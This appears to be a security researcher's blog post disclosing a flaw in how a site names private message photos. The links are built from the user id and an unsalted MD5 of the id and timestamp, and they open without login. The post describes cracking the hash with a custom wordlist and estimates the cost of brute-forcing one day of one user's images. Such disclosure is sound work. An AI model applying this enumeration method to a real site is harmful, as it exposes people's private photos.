Information disclosure and why understanding the logic is crucial
All the actions described in this article were performed with the permission of the site owner as part of vulnerability testing.
In the previous blog post I covered the findings related to temporary file upload. Let’s go further and check whether we can do something with the final file sent to another user.
After the temporary file is uploaded and the message is sent, the file is moved to a different directory and renamed, so it seems we won’t be able to make an XSS work. It also gets a predefined extension, so we cannot exploit the file itself.
Here is what the link to the final file looks like: https://[redacted].com/g/6/182/362/6182362_1f4c9771ba02656fd14994420a522ff3_200.JPG
Getting back to basics
A while ago I was writing web crawlers. A lot of them. One of the most important things for me was understanding the logic behind path generation. It lets us take shortcuts and generate the valid links we need without additional requests to the site, which means lower load on the site and less time to crawl everything.
Let’s try to understand how the link above was generated. My account’s id is 6182362, and we can clearly see it in two places in the link: split across the directory path (6/182/362) and at the start of the file name. Let’s make a template:
https://[redacted].com/g/{id[:1]}/{id[1:4]}/{id[4:]}/{id}_{hash}_200.JPG
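The template above can be sketched as a small Python helper. This is only an illustration: the function name `photo_path_from_template` is made up, the host is omitted because it is redacted, and the slicing has only been checked against the single 7-digit id shown in this post.

```python
def photo_path_from_template(user_id: str, file_hash: str, size: int = 200) -> str:
    """Fill in the path template using the same slices as in the text."""
    return (
        f"/g/{user_id[:1]}/{user_id[1:4]}/{user_id[4:]}/"
        f"{user_id}_{file_hash}_{size}.JPG"
    )


# Rebuilds the path part of the link shown earlier in the post.
print(photo_path_from_template("6182362", "1f4c9771ba02656fd14994420a522ff3"))
# /g/6/182/362/6182362_1f4c9771ba02656fd14994420a522ff3_200.JPG
```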
Crack the hash!
What else do we have here? Let’s check the page source code:
- div id which looks like a timestamp
- data-id which is some additional id (some internal message id?)
- width and height of the full image, and 600 as the number at the end of the link to it
The hash itself looks like MD5: it is 32 hexadecimal characters long, which matches the length of an MD5 digest.
Now it’s time to combine everything. I created a custom wordlist containing every parameter I could find in connection with my account and the message:
- message timestamp
- account’s id
- some hashes from the cookies
- data-id
- all the parts of my id from the link
- height and width
- some divider characters like “_” and “|” that can be used during the hashing
Then I combined them into chains of up to 5 elements using a custom Python script. Now I have a wordlist with every possible combination of these parameters with a chain length of up to 5; the final count is a bit more than 1 million.
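The original script is not shown here, so the following is only a minimal sketch of how such a wordlist could be built. It assumes the tokens are simply concatenated and that a token may repeat within a chain (`itertools.product`); the function name `candidates` is made up, and the token list contains only the values that appear in this post.

```python
from itertools import product


def candidates(tokens, max_len=5):
    """Yield every concatenation of 1..max_len tokens (repetition allowed)."""
    for length in range(1, max_len + 1):
        for chain in product(tokens, repeat=length):
            yield "".join(chain)


# Only the values visible in the post: the id, the timestamp,
# the three parts of the id from the link, and two dividers.
tokens = ["6182362", "1623277252", "6", "182", "362", "_", "|"]

# With 7 tokens and chains of up to 3 elements: 7 + 49 + 343 = 399 candidates.
print(sum(1 for _ in candidates(tokens, max_len=3)))
```

The count grows as the sum of n^k for k from 1 to the maximum chain length, so every extra token makes the list noticeably bigger.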
It’s time to MD5 each of them and compare the result with the hash I have. If we’re lucky enough, we’ll get the parameters used.
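The comparison step might look roughly like the sketch below. The function name `crack_md5` is made up, and the chains are again assumed to be plain concatenations with repetition allowed. To keep the example self-contained, the target hash is computed locally from two known tokens rather than taken from the link.

```python
import hashlib
from itertools import product


def crack_md5(target_hex, tokens, max_len=5):
    """Return the first chain of tokens whose MD5 equals target_hex, or None."""
    target = target_hex.lower()
    for length in range(1, max_len + 1):
        for chain in product(tokens, repeat=length):
            digest = hashlib.md5("".join(chain).encode()).hexdigest()
            if digest == target:
                return chain
    return None


tokens = ["6182362", "1623277252", "_", "|"]

# Demo target built locally, so the search is guaranteed to succeed.
demo_target = hashlib.md5(b"6182362" + b"1623277252").hexdigest()
print(crack_md5(demo_target, tokens, max_len=3))
```

Returning the chain instead of the joined string makes it obvious which parameters were used and in which order.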
Nice, it’s just the id (6182362) followed by the message timestamp (1623277252).
The final generation rule is: https://[redacted].com/g/{id[:1]}/{id[1:4]}/{id[4:]}/{id}_{md5(id+timestamp)}_200.JPG
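Put together, the rule can be sketched as follows. The function name `photo_path_for_message` is made up, the host is left out because it is redacted, and the id and timestamp are assumed to be concatenated as decimal strings before hashing.

```python
import hashlib


def photo_path_for_message(user_id: str, timestamp: int, size: int = 200) -> str:
    """Build the path part of the link from the user id and message timestamp."""
    # Assumption: md5(id + timestamp) means MD5 over the two decimal strings joined.
    digest = hashlib.md5(f"{user_id}{timestamp}".encode()).hexdigest()
    return (
        f"/g/{user_id[:1]}/{user_id[1:4]}/{user_id[4:]}/"
        f"{user_id}_{digest}_{size}.JPG"
    )


print(photo_path_for_message("6182362", 1623277252))
```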
What's next?
We’re missing only one piece to demonstrate the impact. Let’s log out and open the link to the photo we sent.
Let’s summarise:
The only two parameters we need to build a valid link to an image uploaded by a user are:
- user id
- timestamp
We don’t need to be logged in to view photos sent by users; we just need a valid link. The id can be found directly in the user’s profile. As for the timestamp... Thankfully, it only has one-second resolution.
For a given user id we need to make 24*60*60 = 86400 requests to cover every possible link for one day, and the valid ones among them are all the photos that user sent within that day. Not a big deal if you want to compromise someone: at 10 requests per second it takes only 2.4 hours to check a whole day.
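The arithmetic behind this estimate, as a quick sketch (the helper name `hours_to_scan` is made up; the rate of 10 requests per second is the one from the text):

```python
SECONDS_PER_DAY = 24 * 60 * 60  # one candidate timestamp per second


def hours_to_scan(days: int = 1, requests_per_second: float = 10) -> float:
    """Hours needed to request every candidate link for one user id."""
    return days * SECONDS_PER_DAY / requests_per_second / 3600


print(SECONDS_PER_DAY)   # 86400
print(hours_to_scan())   # 2.4
```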
Thank you for reading and keep your hashes salted and access restricted properly :)